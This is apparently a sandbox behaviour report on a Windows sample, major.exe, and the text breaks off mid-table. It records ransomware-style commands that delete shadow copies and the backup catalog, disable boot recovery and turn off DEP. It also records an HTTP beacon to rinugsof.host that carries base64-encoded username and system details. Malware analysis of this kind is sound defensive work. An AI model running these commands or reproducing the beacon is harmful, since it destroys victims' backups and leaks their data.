| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSRWLock, address_out = 0x77c13a00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x77bf58e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableSRW, address_out = 0x7500fcf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWork, address_out = 0x75ea6db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SubmitThreadpoolWork, address_out = 0x77bfeb00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWork, address_out = 0x77bfed50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel.appcore.dll | function = GetCurrentPackageId, address_out = 0x75ba3510 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Username | user_name_out = FD1HVy |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-04 07:13:50 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 14738394005 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\WINDOWS |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = 1506877342345 |
|
1 | |
| Open | mutex_name = 1506877342345, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| c:\users\fd1hvy\desktop\major.exe | type = DEBUG_STRING, text = GET /starta?bs=MTUwNjg3NzM0MjM0NTtXaW5kb3dzIDEwIFBybyBVc2VyTmFtZTogRkQxSFZ5O2JtcHNAdHV0YW5vdGEuY29t HTTP/1.1 Accept: text/* User-Agent: Random String Host: rinugsof.host |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 176 bytes |
| Total Data Received | 802 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 185.117.119.95 |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | rinugsof.host |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 176 bytes |
| Data Received | 802 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Random String, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = rinugsof.host, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = starta?bs=MTUwNjg3NzM0MjM0NTtXaW5kb3dzIDEwIFBybyBVc2VyTmFtZTogRkQxSFZ5O2Jt cHNAdHV0YW5vdGEuY29t , accept_types = 1701004, flags = INTERNET_FLAG_NO_COOKIES |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = rinugsof.host/starta?bs=MTUwNjg3NzM0MjM0NTtXaW5kb3dzIDEwIFBybyBVc2VyTmFtZTogRkQxSFZ5O2Jt cHNAdHV0YW5vdGEuY29t |
|
1 | |
| Read Response | size = 1023, size_out = 451 |
|
1 | |
| Read Response | size = 1023, size_out = 0 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_REQUEST_HEADERS, HTTP_QUERY_RAW_HEADERS_CRLF |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_REQUEST_HEADERS, HTTP_QUERY_RAW_HEADERS_CRLF, size_out = 352 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: cmd.exe
62
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /C bcdedit /set {default} bootstatuspolicy ignoreallfailures |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xef8 |
| Parent PID | 0xdc4 (c:\users\fd1hvy\desktop\major.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CE0
0x
A60
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
7 | |
| Open | STD_INPUT_HANDLE | - |
|
6 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 4, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\bcdedit.exe | os_pid = 0xd74, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff6a7ec0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ff92fdea990 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ff92fdee830 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ff92fdee300 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #4: cmd.exe
63
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /C bcdedit /set {default} recoveryenabled no |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xac8 |
| Parent PID | 0xdc4 (c:\users\fd1hvy\desktop\major.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BB4
0x
CF0
|
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
6 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 4, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\bcdedit.exe | os_pid = 0x9e4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff6a7ec0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ff92fdea990 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ff92fdee830 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ff92fdee300 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #5: cmd.exe
62
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /C wbadmin delete catalog -quiet |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:48, Reason: Self Terminated |
| Monitor Duration | 00:00:22 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x37c |
| Parent PID | 0xdc4 (c:\users\fd1hvy\desktop\major.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D00
0x
D60
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
5 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 4, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\wbadmin.exe | os_pid = 0x7bc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff6a7ec0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ff92fdea990 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ff92fdee830 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ff92fdee300 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #6: cmd.exe
63
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /C vssadmin.exe delete shadows /all /quiet |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:36, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x754 |
| Parent PID | 0xdc4 (c:\users\fd1hvy\desktop\major.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
824
0x
D84
|
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | vssadmin.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
5 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 4, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\vssadmin.exe | os_pid = 0xd4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff6a7ec0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ff92fdea990 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ff92fdee830 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ff92fdee300 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #7: cmd.exe
63
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /C bcdedit.exe /set {current} nx AlwaysOff |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8e8 |
| Parent PID | 0xdc4 (c:\users\fd1hvy\desktop\major.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B10
0x
CE8
|
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | bcdedit.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
5 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
